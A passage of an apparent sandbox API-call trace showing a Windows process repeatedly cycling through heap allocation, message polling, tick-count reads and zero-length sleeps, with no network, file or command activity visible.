RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.788] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.788] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.788] GetTickCount () returned 0x1c3f9 [0062.788] GetTickCount () returned 0x1c3f9 [0062.788] GetTickCount () returned 0x1c3f9 [0062.788] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.788] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.788] GetTickCount () returned 0x1c3f9 [0062.788] Sleep (dwMilliseconds=0x0) [0062.803] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.803] GetLastError () returned 0x0 [0062.803] GetCurrentProcessId () returned 0xa44 [0062.803] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.803] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.803] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.803] GetTickCount () returned 0x1c409 [0062.803] GetTickCount () returned 0x1c409 [0062.803] GetTickCount () returned 0x1c409 [0062.803] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.803] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.803] GetTickCount () returned 0x1c409 [0062.804] Sleep (dwMilliseconds=0x0) [0062.819] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.834] GetLastError () returned 0x0 [0062.834] GetCurrentProcessId () returned 0xa44 [0062.834] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.834] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.834] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.834] GetTickCount () returned 0x1c428 [0062.834] GetTickCount () returned 0x1c428 [0062.834] GetTickCount () returned 0x1c428 [0062.834] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.834] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.834] GetTickCount () returned 0x1c428 [0062.835] Sleep (dwMilliseconds=0x0) [0062.850] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.865] GetLastError () returned 0x0 [0062.865] GetCurrentProcessId () returned 0xa44 [0062.865] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.865] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.865] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.865] GetTickCount () returned 0x1c447 [0062.865] GetTickCount () returned 0x1c447 [0062.866] GetTickCount () returned 0x1c447 [0062.866] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.866] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.866] GetTickCount () returned 0x1c447 [0062.866] Sleep (dwMilliseconds=0x0) [0062.881] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.912] GetLastError () returned 0x0 [0062.912] GetCurrentProcessId () returned 0xa44 [0062.912] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.912] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.913] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.913] GetTickCount () returned 0x1c476 [0062.913] GetTickCount () returned 0x1c476 [0062.913] GetTickCount () returned 0x1c476 [0062.913] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.913] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.913] GetTickCount () returned 0x1c476 [0062.913] Sleep (dwMilliseconds=0x0) [0062.913] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.913] GetLastError () returned 0x0 [0062.913] GetCurrentProcessId () returned 0xa44 [0062.914] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.914] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.914] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.914] GetTickCount () returned 0x1c476 [0062.914] GetTickCount () returned 0x1c476 [0062.914] GetTickCount () returned 0x1c476 [0062.914] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.914] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.914] GetTickCount () returned 0x1c476 [0062.914] Sleep (dwMilliseconds=0x0) [0062.930] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.943] GetLastError () returned 0x0 [0062.943] GetCurrentProcessId () returned 0xa44 [0062.943] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.943] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.943] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.943] GetTickCount () returned 0x1c495 [0062.944] GetTickCount () returned 0x1c495 [0062.944] GetTickCount () returned 0x1c495 [0062.944] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.944] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.944] GetTickCount () returned 0x1c495 [0062.944] Sleep (dwMilliseconds=0x0) [0062.974] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0062.998] GetLastError () returned 0x0 [0062.998] GetCurrentProcessId () returned 0xa44 [0062.998] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0062.998] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0062.998] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0062.998] GetTickCount () returned 0x1c4c4 [0062.998] GetTickCount () returned 0x1c4c4 [0062.998] GetTickCount () returned 0x1c4c4 [0062.998] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0062.998] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0062.998] GetTickCount () returned 0x1c4c4 [0062.998] Sleep (dwMilliseconds=0x0) [0063.006] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.021] GetLastError () returned 0x0 [0063.021] GetCurrentProcessId () returned 0xa44 [0063.021] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.021] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.022] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.022] GetTickCount () returned 0x1c4e3 [0063.022] GetTickCount () returned 0x1c4e3 [0063.022] GetTickCount () returned 0x1c4e3 [0063.022] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.022] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.022] GetTickCount () returned 0x1c4e3 [0063.022] Sleep (dwMilliseconds=0x0) [0063.037] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.052] GetLastError () returned 0x0 [0063.052] GetCurrentProcessId () returned 0xa44 [0063.053] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.053] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.053] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.053] GetTickCount () returned 0x1c503 [0063.053] GetTickCount () returned 0x1c503 [0063.053] GetTickCount () returned 0x1c503 [0063.053] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.053] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.053] GetTickCount () returned 0x1c503 [0063.053] Sleep (dwMilliseconds=0x0) [0063.053] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.053] GetLastError () returned 0x0 [0063.054] GetCurrentProcessId () returned 0xa44 [0063.054] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.054] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.054] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.054] GetTickCount () returned 0x1c503 [0063.054] GetTickCount () returned 0x1c503 [0063.054] GetTickCount () returned 0x1c503 [0063.054] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.054] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.054] GetTickCount () returned 0x1c503 [0063.054] Sleep (dwMilliseconds=0x0) [0063.068] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.068] GetLastError () returned 0x0 [0063.068] GetCurrentProcessId () returned 0xa44 [0063.068] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.068] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.068] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.068] GetTickCount () returned 0x1c512 [0063.068] GetTickCount () returned 0x1c512 [0063.069] GetTickCount () returned 0x1c512 [0063.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.069] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.069] GetTickCount () returned 0x1c512 [0063.069] Sleep (dwMilliseconds=0x0) [0063.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.099] GetLastError () returned 0x0 [0063.099] GetCurrentProcessId () returned 0xa44 [0063.099] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.099] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.100] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.100] GetTickCount () returned 0x1c531 [0063.100] GetTickCount () returned 0x1c531 [0063.100] GetTickCount () returned 0x1c531 [0063.100] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.100] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.100] GetTickCount () returned 0x1c531 [0063.100] Sleep (dwMilliseconds=0x0) [0063.115] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.131] GetLastError () returned 0x0 [0063.131] GetCurrentProcessId () returned 0xa44 [0063.131] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.131] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.131] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.131] GetTickCount () returned 0x1c551 [0063.131] GetTickCount () returned 0x1c551 [0063.131] GetTickCount () returned 0x1c551 [0063.131] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.131] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.131] GetTickCount () returned 0x1c551 [0063.131] Sleep (dwMilliseconds=0x0) [0063.162] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.177] GetLastError () returned 0x0 [0063.177] GetCurrentProcessId () returned 0xa44 [0063.177] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.177] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.178] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.178] GetTickCount () returned 0x1c57f [0063.178] GetTickCount () returned 0x1c57f [0063.178] GetTickCount () returned 0x1c57f [0063.178] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.178] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.178] GetTickCount () returned 0x1c57f [0063.178] Sleep (dwMilliseconds=0x0) [0063.193] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.208] GetLastError () returned 0x0 [0063.208] GetCurrentProcessId () returned 0xa44 [0063.208] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.208] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.209] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.209] GetTickCount () returned 0x1c59f [0063.209] GetTickCount () returned 0x1c59f [0063.209] GetTickCount () returned 0x1c59f [0063.209] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.209] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.209] GetTickCount () returned 0x1c59f [0063.209] Sleep (dwMilliseconds=0x0) [0063.224] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.240] GetLastError () returned 0x0 [0063.240] GetCurrentProcessId () returned 0xa44 [0063.240] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.240] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.240] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.240] GetTickCount () returned 0x1c5be [0063.240] GetTickCount () returned 0x1c5be [0063.240] GetTickCount () returned 0x1c5be [0063.240] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.240] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.240] GetTickCount () returned 0x1c5be [0063.240] Sleep (dwMilliseconds=0x0) [0063.255] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.286] GetLastError () returned 0x0 [0063.287] GetCurrentProcessId () returned 0xa44 [0063.287] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.287] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.287] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.287] GetTickCount () returned 0x1c5ed [0063.287] GetTickCount () returned 0x1c5ed [0063.287] GetTickCount () returned 0x1c5ed [0063.287] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.287] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.287] GetTickCount () returned 0x1c5ed [0063.287] Sleep (dwMilliseconds=0x0) [0063.302] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.320] GetLastError () returned 0x0 [0063.320] GetCurrentProcessId () returned 0xa44 [0063.320] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.320] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.320] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.320] GetTickCount () returned 0x1c60c [0063.321] GetTickCount () returned 0x1c60c [0063.321] GetTickCount () returned 0x1c60c [0063.321] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.321] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.321] GetTickCount () returned 0x1c60c [0063.321] Sleep (dwMilliseconds=0x0) [0063.333] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.349] GetLastError () returned 0x0 [0063.349] GetCurrentProcessId () returned 0xa44 [0063.349] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.349] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.349] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.349] GetTickCount () returned 0x1c62b [0063.349] GetTickCount () returned 0x1c62b [0063.349] GetTickCount () returned 0x1c62b [0063.349] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.349] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.350] GetTickCount () returned 0x1c62b [0063.350] Sleep (dwMilliseconds=0x0) [0063.364] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.380] GetLastError () returned 0x0 [0063.380] GetCurrentProcessId () returned 0xa44 [0063.380] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.380] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.380] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.380] GetTickCount () returned 0x1c64a [0063.380] GetTickCount () returned 0x1c64a [0063.380] GetTickCount () returned 0x1c64a [0063.380] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.380] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.380] GetTickCount () returned 0x1c64a [0063.381] Sleep (dwMilliseconds=0x0) [0063.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.411] GetLastError () returned 0x0 [0063.411] GetCurrentProcessId () returned 0xa44 [0063.411] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.411] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.411] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.411] GetTickCount () returned 0x1c669 [0063.412] GetTickCount () returned 0x1c669 [0063.412] GetTickCount () returned 0x1c669 [0063.412] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.412] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.412] GetTickCount () returned 0x1c669 [0063.412] Sleep (dwMilliseconds=0x0) [0063.427] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.443] GetLastError () returned 0x0 [0063.443] GetCurrentProcessId () returned 0xa44 [0063.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.443] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.443] GetTickCount () returned 0x1c689 [0063.443] GetTickCount () returned 0x1c689 [0063.443] GetTickCount () returned 0x1c689 [0063.443] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.443] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.443] GetTickCount () returned 0x1c689 [0063.443] Sleep (dwMilliseconds=0x0) [0063.474] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.474] GetLastError () returned 0x0 [0063.474] GetCurrentProcessId () returned 0xa44 [0063.474] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.474] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.474] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.474] GetTickCount () returned 0x1c6a8 [0063.474] GetTickCount () returned 0x1c6a8 [0063.474] GetTickCount () returned 0x1c6a8 [0063.474] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.474] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.475] GetTickCount () returned 0x1c6a8 [0063.475] Sleep (dwMilliseconds=0x0) [0063.475] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.489] GetLastError () returned 0x0 [0063.489] GetCurrentProcessId () returned 0xa44 [0063.489] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.489] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.489] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.489] GetTickCount () returned 0x1c6b7 [0063.490] GetTickCount () returned 0x1c6b7 [0063.490] GetTickCount () returned 0x1c6b7 [0063.490] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.490] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.490] GetTickCount () returned 0x1c6b7 [0063.490] Sleep (dwMilliseconds=0x0) [0063.505] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.536] GetLastError () returned 0x0 [0063.536] GetCurrentProcessId () returned 0xa44 [0063.536] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.536] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.536] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.536] GetTickCount () returned 0x1c6e6 [0063.536] GetTickCount () returned 0x1c6e6 [0063.536] GetTickCount () returned 0x1c6e6 [0063.536] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.536] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.536] GetTickCount () returned 0x1c6e6 [0063.537] Sleep (dwMilliseconds=0x0) [0063.552] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.567] GetLastError () returned 0x0 [0063.567] GetCurrentProcessId () returned 0xa44 [0063.567] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.567] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.567] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.568] GetTickCount () returned 0x1c705 [0063.568] GetTickCount () returned 0x1c705 [0063.568] GetTickCount () returned 0x1c705 [0063.568] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.568] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.568] GetTickCount () returned 0x1c705 [0063.568] Sleep (dwMilliseconds=0x0) [0063.568] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.583] GetLastError () returned 0x0 [0063.583] GetCurrentProcessId () returned 0xa44 [0063.583] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.583] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.583] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.583] GetTickCount () returned 0x1c715 [0063.583] GetTickCount () returned 0x1c715 [0063.583] GetTickCount () returned 0x1c715 [0063.583] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.583] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.583] GetTickCount () returned 0x1c715 [0063.584] Sleep (dwMilliseconds=0x0) [0063.598] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.599] GetLastError () returned 0x0 [0063.599] GetCurrentProcessId () returned 0xa44 